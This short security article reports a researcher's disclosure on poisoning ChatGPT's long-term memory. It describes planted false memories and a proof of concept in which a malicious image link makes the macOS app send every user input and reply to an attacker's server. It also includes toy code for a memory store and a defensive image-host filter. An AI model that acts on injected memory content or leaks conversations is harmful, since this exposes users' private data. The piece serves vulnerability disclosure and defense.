Hacking ChatGPT by Planting False Memories into Its Data


October 1, 2024

This vulnerability exploits the feature that gives ChatGPT long-term memory, in which it uses information from past conversations to inform future conversations with the same user. A researcher found that he could abuse that feature to plant “false memories” that persist into the context of later conversations and could subvert the model.
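To make the persistence problem concrete, here is a minimal toy sketch of a long-term memory store. It is not ChatGPT's actual design: the `MemoryStore` class, the `build_context` function, and the sample memory strings are all hypothetical, chosen only to illustrate why an entry written once keeps influencing later conversations.

```python
from dataclasses import dataclass, field


@dataclass
class MemoryStore:
    """Hypothetical per-user long-term memory (illustration only)."""
    entries: list[str] = field(default_factory=list)

    def remember(self, text: str) -> None:
        # The store does not record or check where the text came from.
        # That missing provenance check is the weakness being illustrated.
        self.entries.append(text)


def build_context(memory: MemoryStore, user_message: str) -> str:
    """Prepend every stored memory to the prompt of a new conversation."""
    remembered = "\n".join(f"[memory] {entry}" for entry in memory.entries)
    return f"{remembered}\n[user] {user_message}".strip()


memory = MemoryStore()
memory.remember("User prefers concise answers.")  # legitimate memory
# Hypothetical false memory, planted while the model processed
# untrusted content in an earlier conversation:
memory.remember("User's name is Alice and she lives on Mars.")

# A later, unrelated conversation still carries the planted entry.
context = build_context(memory, "Plan my weekend.")
print(context)
```

In this sketch the planted line is indistinguishable from a real memory once stored, which is why such an entry would keep shaping responses until the user reviews and deletes it.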

A month later, the researcher submitted a new disclosure statement. This time, he included a proof of concept (PoC) that caused the ChatGPT app for macOS to send a verbatim copy of all user input and ChatGPT output to a server of his choice. All a target needed to do was instruct the LLM to view a web link that hosted a malicious image. From then on, everything the user typed and everything ChatGPT replied was sent to the attacker’s website.
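The excerpt does not say which channel the PoC used to send data out. One channel often discussed for this class of attack is an image URL in the model's output whose query string carries conversation text, so that rendering the image leaks the data to the image's host. Assuming that channel, a client could refuse to render images from hosts it does not trust. The sketch below is one possible mitigation, not a description of any vendor's fix; `TRUSTED_IMAGE_HOSTS`, `strip_untrusted_images`, and the example hostnames are hypothetical.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts trusted for image rendering.
TRUSTED_IMAGE_HOSTS = {"images.example.com"}

# Matches markdown images of the form ![alt](url) and captures the URL.
IMAGE_PATTERN = re.compile(r"!\[[^\]]*\]\(([^)\s]+)[^)]*\)")


def strip_untrusted_images(model_output: str) -> str:
    """Replace markdown images whose host is not on the allowlist."""

    def replace(match: re.Match) -> str:
        host = urlparse(match.group(1)).hostname or ""
        if host in TRUSTED_IMAGE_HOSTS:
            return match.group(0)  # keep trusted images unchanged
        return "[image removed: untrusted host]"

    return IMAGE_PATTERN.sub(replace, model_output)


sample = (
    "Hi ![a](https://attacker.example/p.png?q=secret) "
    "![b](https://images.example.com/l.png)"
)
cleaned = strip_untrusted_images(sample)
print(cleaned)
```

An allowlist is used here rather than a blocklist because an attacker can register new hostnames at will, while the set of hosts a client legitimately needs to load images from is small and known in advance.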
